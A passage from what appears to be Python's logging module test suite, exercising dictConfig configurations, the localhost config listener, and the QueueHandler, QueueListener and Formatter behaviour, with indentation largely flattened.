'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
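    # out_of_order declares a "$" style with a %-style format string and a
    # MemoryHandler whose 'target' names another handler; exercised by
    # test_out_of_order and test_out_of_order_with_dollar_style.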
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
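    # Send `text` to a logging.config.listen() socket server and wait for the
    # configuration to be applied; `verify` is passed straight through to listen().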
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
    def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
        # Deep-copy so the shared class-level config dict is not mutated when
        # the formatter style is changed for this test only.
        config = copy.deepcopy(self.custom_formatter_class_validate)
        config['formatters']['form1']['style'] = "$"
        # No exception should be raised, as 'validate' is configured to False.
        self.apply_config(config)
        handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
        self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
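    # Exercise BaseConfigurator.convert() directly: cfg:// paths may mix
    # attribute access and [index]/[key] subscripts.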
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
        # Test that the traceback is only appended once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
            except queue.Empty:
                return  # end the generator; a return value here would be ignored
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# bpo-28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
            for i in range(self.repeat):
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
                # time.sleep(1)
                items = list(self.get_all_from_queue(log_queue))
                log_queue.close()
                log_queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
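# Minimal fixed-offset tzinfo giving a UTC instance for FormatterTest.test_time
# and test_default_msec_format_none.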
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
    def assert_error_message(self, exception, message, *args, **kwargs):
        try:
            self.assertRaises(exception, *args, **kwargs)
        except exception as e:
            # Python 3 exceptions have no .message attribute; compare str(e).
            self.assertEqual(message, str(e))
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)#15s')
self.assertTrue(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(ValueError, f.format, r)
f = logging.Formatter("{message}", style='{')
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('${message}', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(ValueError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${message}', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}--', style='$')
self.assertTrue(f.usesTime())
def test_format_validate(self):
# Check correct formatting
# Percentage style
f = logging.Formatter("%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
self.assertEqual(f._fmt, "%(levelname)-15s - %(message) 5s - %(process)03d - %(module) - %(asctime)*.3s")
f = logging.Formatter("%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
self.assertEqual(f._fmt, "%(asctime)*s - %(asctime)*.3s - %(process)-34.33o")
f = logging.Formatter("%(process)#+027.23X")
self.assertEqual(f._fmt, "%(process)#+027.23X")
f = logging.Formatter("%(foo)#.*g")
self.assertEqual(f._fmt, "%(foo)#.*g")
# StrFormat Style
f = logging.Formatter("$%{message}%$ - {asctime!a:15} - {customfield['key']}", style="{")
self.assertEqual(f._fmt, "$%{message}%$ - {asctime!a:15} - {customfield['key']}")
f = logging.Formatter("{process:.2f} - {custom.f:.4f}", style="{")
self.assertEqual(f._fmt, "{process:.2f} - {custom.f:.4f}")
f = logging.Formatter("{customfield!s:#<30}", style="{")
self.assertEqual(f._fmt, "{customfield!s:#<30}")
f = logging.Formatter("{message!r}", style="{")
self.assertEqual(f._fmt, "{message!r}")
f = logging.Formatter("{message!s}", style="{")
self.assertEqual(f._fmt, "{message!s}")
f = logging.Formatter("{message!a}", style="{")
self.assertEqual(f._fmt, "{message!a}")
f = logging.Formatter("{process!r:4.2}", style="{")
self.assertEqual(f._fmt, "{process!r:4.2}")
f = logging.Formatter("{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}", style="{")
self.assertEqual(f._fmt, "{process!s:<#30,.12f}- {custom:=+#30,.1d} - {module:^30}")
f = logging.Formatter("{process!s:{w},.{p}}", style="{")
self.assertEqual(f._fmt, "{process!s:{w},.{p}}")
f = logging.Formatter("{foo:12.{p}}", style="{")
self.assertEqual(f._fmt, "{foo:12.{p}}")
f = logging.Formatter("{foo:{w}.6}", style="{")
self.assertEqual(f._fmt, "{foo:{w}.6}")
f = logging.Formatter("{foo[0].bar[1].baz}", style="{")
self.assertEqual(f._fmt, "{foo[0].bar[1].baz}")
f = logging.Formatter("{foo[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{foo[k1].bar[k2].baz}")
f = logging.Formatter("{12[k1].bar[k2].baz}", style="{")
self.assertEqual(f._fmt, "{12[k1].bar[k2].baz}")
# Dollar style
